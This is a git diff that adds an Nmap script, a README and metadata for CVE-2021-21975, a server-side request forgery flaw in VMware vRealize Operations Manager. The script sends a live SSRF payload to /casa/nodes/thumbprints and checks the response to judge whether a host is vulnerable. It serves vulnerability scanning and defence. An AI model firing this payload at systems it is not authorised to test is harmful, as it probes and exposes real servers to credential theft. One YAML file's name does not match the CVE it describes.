diff --git a/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif b/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif
new file mode 100644
index 0000000000000000000000000000000000000000..5289bc1d34503cff9dd845edcddbd4f2a3302c08
Binary files /dev/null and b/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif differ
diff --git a/cve/vmware/2021/CVE-2021-21975/README.md b/cve/vmware/2021/CVE-2021-21975/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..852561d4360b0a5c7972faeb1e8d7906294a166a
--- /dev/null
+++ b/cve/vmware/2021/CVE-2021-21975/README.md
@@ -0,0 +1,17 @@
+# CVE-2021-21975
+Nmap script to check vulnerability CVE-2021-21975
+
+## Vulnerability References:
+
+https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+
+https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+## Blog
+https://www.guayoyo.io/post/cve-2021-21975-vmware-vrealize-operations-manager-ssrf-lo-que-necesitas-saber
+
+## Example
+
+nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
+
+![CVE-2021-21975](113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif)
diff --git a/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse b/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse
new file mode 100644
index 0000000000000000000000000000000000000000..3b03c28b1922f4976785d73c99dd253269867958
--- /dev/null
+++ b/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse
@@ -0,0 +1,103 @@
+description = [[
+VMware vRealize Operations Manager CVE-2021-21975 SSRF Vulnerability - Check
+
+Este script de Nmap busca verificar la vulnerabilidad CVE-2021-21975 en la siguiente ruta 
+"/casa/nodes/thumbprints" mediante una solicitud POST e interpretando la 
+respuesta HTTP 200. Si se encuentran las palabras "vRealize Operations Manager", "thumbprint" y "address" 
+significa que vRealize Operations Manager es vulnerable a SSRF. 
+
+References: 
+https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+]]
+
+---
+-- @usage
+-- nmap -p443 --script CVE-2021-21975.nse <target>
+-- @output
+-- PORT    STATE SERVICE
+-- 443/tcp open  https
+-- | CVE-2021-21975: 
+-- |   VULNERABLE:
+-- |   VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF
+-- |     State: VULNERABLE (Exploitable)
+-- |     IDs:  CVE:CVE-2021-21975
+-- |	 Risk factor: HIGH  CVSS: 8.6	
+-- |       Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
+-- |       vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
+-- |     Disclosure date: 2021-03-30
+-- |     References:
+-- |       https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+-- |_      https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+
+author      = "Edgar Salazar <edgar.salazar@guayoyo.io>"
+license     = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories  = {"vuln", "exploit"}
+
+local shortport = require "shortport"
+local http      = require "http"
+local stdnse    = require "stdnse"
+local string    = require "string"
+local vulns     = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+
+    local vuln = {
+        title = "VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF",
+        state = vulns.STATE.NOT_VULN,
+        risk_factor = "HIGH",
+        scores = { 
+            CVSS = "8.6",
+   	},
+        IDS = { CVE = 'CVE-2021-21975' },
+	    description = [[
+            Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
+            vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
+        ]], 
+        references = {
+            'https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975',
+            'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'
+       	},
+       	dates = {
+            disclosure = {year = '2021', month = '03', day = '30'},
+        },
+    } 
+
+    local report = vulns.Report:new(SCRIPT_NAME, host, port)
+    local uri = "/casa/nodes/thumbprints"
+    local PAYLOAD_JSON = [=[["127.0.0.1:443/ui/"]]=]
+    local options = {header={}}
+    options["header"]["Host"] = 'action'
+    options["header"]["Content-Type"] = 'application/json'
+    options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
+    
+    vuln.state = vulns.STATE.NOT_VULN
+
+    local response = http.post(host, port, uri, options, nil, PAYLOAD_JSON)
+    
+    if response.status == 200 and
+            string.find(response.body, "vRealize Operations Manager") and 
+            string.find(response.body, "thumbprint") and 
+            string.find(response.body, "address") then
+        vuln.state = vulns.STATE.EXPLOIT
+    else
+        uri = "/ui/login.action"
+        options = {header={}}
+        options["header"]["Host"] = 'action'
+        options["header"]["Accept"] = 'text/html,application/xhtml+xml,application/xml'
+        options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
+        response = http.get(host, port, uri, options)
+        if response.status == 200  and (
+                string.find(response.body, "version=7.0.0") or string.find(response.body, "version=7.5.0") or 
+                string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.0.1") or 
+                string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.1.0") or 
+                string.find(response.body, "version=8.1.1") or string.find(response.body, "version=8.2.0") or 
+                string.find(response.body, "version=8.3.0")) then
+            vuln.state = vulns.STATE.LIKELY_VULN
+        end 
+    end
+    return report:make_output (vuln)
+end
diff --git a/cve/vmware/2021/yaml/CVE-2019-12735.yaml b/cve/vmware/2021/yaml/CVE-2019-12735.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ee2ceba87124a9048f7c92cbf3044875d0ec6bd1
--- /dev/null
+++ b/cve/vmware/2021/yaml/CVE-2019-12735.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-21975
+source: https://github.com/GuayoyoCyber/CVE-2021-21975
+info:
+  name: Vmware是一款虚拟机软件。
+  severity: high
+  description: |
+    vRealize Operations Manager API 8.4之前版本存在服务器端请求伪造，可能允许有网络访问权的攻击者发起SSRF以窃取管理凭证。
+  scope-of-influence:
+    vmware vRealize Operations Manager API < 8.4
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
+    - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-21975
+    cwe-id: CWE-918
+    cnvd-id: None
+    kve-id: None
+  tags: SSRF, cve2021
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a9f9109b0065f24811326d3a98661d801bc079fa..db0e269f2d757e8a73cb0d9d6af5f35a7f691f1f 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -127,6 +127,8 @@ cve:
     - CVE-2023-1170
     - CVE-2023-1175
     - CVE-2023-1264
+  vmware:
+    - CVE-2021-21975
   openssl:
     - CVE-2022-1292
     - CVE-2022-2274